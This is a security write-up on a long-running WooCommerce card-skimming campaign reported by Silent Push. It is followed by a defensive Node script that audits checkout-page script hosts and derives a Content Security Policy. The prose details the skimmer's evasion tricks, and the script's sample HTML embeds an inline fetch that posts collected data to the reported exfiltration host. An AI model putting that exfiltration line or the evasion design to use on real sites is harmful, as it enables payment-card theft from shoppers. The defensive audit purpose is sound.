Overview
- Silent Push disclosed that a covert web‑skimming operation has operated since January 2022 and remains active.
- The malware swaps the real checkout for a fake Stripe‑styled payment form, captures full card details together with the victim's name, email, phone number and address, then throws an error prompt and restores the legitimate checkout page, so the victim sees nothing more than a failed first attempt.
- The skimmer evades detection in three ways: it removes itself when the WordPress admin bar is present (that is, when a logged‑in site administrator is viewing the page), it fires on DOM changes rather than on page load, and it sets a flag keyed on WooCommerce's wc_cart_hash value so the same victim is not skimmed twice.
- Obfuscated payloads are served from innocuous‑looking domains such as cdn-cookie[.]com, hosted by a bulletproof provider tied to Stark Industries/PQ.Hosting; the stolen data is reported to be exfiltrated to lasorie[.]com.
- Card brands targeted include American Express, Diners Club, Discover, JCB, Mastercard and UnionPay. The researchers urge merchants to deploy a Content Security Policy (CSP), keep WordPress, WooCommerce and plugins rigorously updated and enforce MFA on admin accounts, and urge cardholders to monitor their statements closely.
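The loader domain, the exfiltration host and the CSP recommendation above suggest a concrete merchant-side check: audit which hosts a checkout page actually loads scripts from and talks to, compare them with an allowlist, and derive a CSP that would have blocked both the loader and the exfiltration. The following Node script is an added example written for this page, not code from Silent Push or from the skimmer. The merchant host shop.example, the allowlists and the sample HTML are constructed; the only names taken from the report are cdn-cookie[.]com and lasorie[.]com.

```javascript
'use strict';

// Constructed sample of a WooCommerce checkout page carrying an injected
// loader. The merchant host shop.example is hypothetical; the loader and
// exfiltration domains are the ones the report names.
const SAMPLE_HTML = `<!doctype html>
<html><head>
<script src="https://js.stripe.com/v3/"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script src="https://cdn-cookie.com/assets/cookie.js" async></script>
<script>
  // stand-in for an obfuscated inline stage: consults the WooCommerce cart
  // hash flag and posts collected fields to the exfiltration host
  var done = localStorage.getItem('wc_cart_hash');
  if (!done) fetch('https://lasorie.com/collect', { method: 'POST', body: '...' });
</script>
</head><body><form id="checkout" action="/checkout"></form></body></html>`;

// Assumed allowlists for the hypothetical merchant.
const SITE_HOST = 'shop.example';
const ALLOWED_SCRIPT_HOSTS = [SITE_HOST, 'js.stripe.com'];
const ALLOWED_CONNECT_HOSTS = [SITE_HOST, 'api.stripe.com'];

// Hostnames of every <script src=...>; relative paths resolve to the site host.
function extractScriptHosts(html, siteHost) {
  const hosts = new Set();
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    hosts.add(new URL(m[1], `https://${siteHost}/`).hostname);
  }
  return [...hosts];
}

// Hostnames of absolute URLs inside inline <script> bodies: a cheap indicator
// of where inline code could send data. Obfuscated stages hide these, so an
// empty result is not a clean bill of health.
function extractInlineUrlHosts(html) {
  const hosts = new Set();
  const blockRe = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
  let b;
  while ((b = blockRe.exec(html)) !== null) {
    let u;
    while ((u = urlRe.exec(b[1])) !== null) hosts.add(u[1].toLowerCase());
  }
  return [...hosts];
}

function unexpectedHosts(found, allowed) {
  return found.filter(h => !allowed.includes(h));
}

// CSP that pins script loading, fetch/XHR targets and form submission to the
// allowlist. No 'unsafe-inline', so an injected inline stage is blocked too.
function buildCsp(scriptHosts, connectHosts, siteHost) {
  const origins = hosts =>
    hosts.filter(h => h !== siteHost).map(h => `https://${h}`).join(' ');
  return [
    "default-src 'self'",
    `script-src 'self' ${origins(scriptHosts)}`,
    `connect-src 'self' ${origins(connectHosts)}`,
    "form-action 'self'",
  ].join('; ');
}

// Full audit: hosts outside the allowlist plus the policy that would block them.
function auditCheckoutPage(html, siteHost, allowedScript, allowedConnect) {
  return {
    unexpectedScriptHosts: unexpectedHosts(extractScriptHosts(html, siteHost), allowedScript),
    unexpectedConnectHosts: unexpectedHosts(extractInlineUrlHosts(html), allowedConnect),
    csp: buildCsp(allowedScript, allowedConnect, siteHost),
  };
}

console.log(JSON.stringify(
  auditCheckoutPage(SAMPLE_HTML, SITE_HOST, ALLOWED_SCRIPT_HOSTS, ALLOWED_CONNECT_HOSTS), null, 2));
```

Two points matter when running a check like this against a real store. First, fetch the page the way a customer does: the skimmer removes itself when the WordPress admin bar is present and will not fire again in a browser whose wc_cart_hash flag is already set, so an administrator's logged-in session or a reused test profile can show a clean page while customers are being skimmed. Second, the allowlist here is an assumption: derive it from the merchant's real traffic (a Stripe integration, for instance, also needs frame-src for its hosted iframe), deploy the result as Content-Security-Policy-Report-Only first, and only then enforce it. The regex-based extraction is illustrative; a production audit should parse the DOM properly and also inspect the fetched script bodies, since an obfuscated loader will not expose its exfiltration host in plain text.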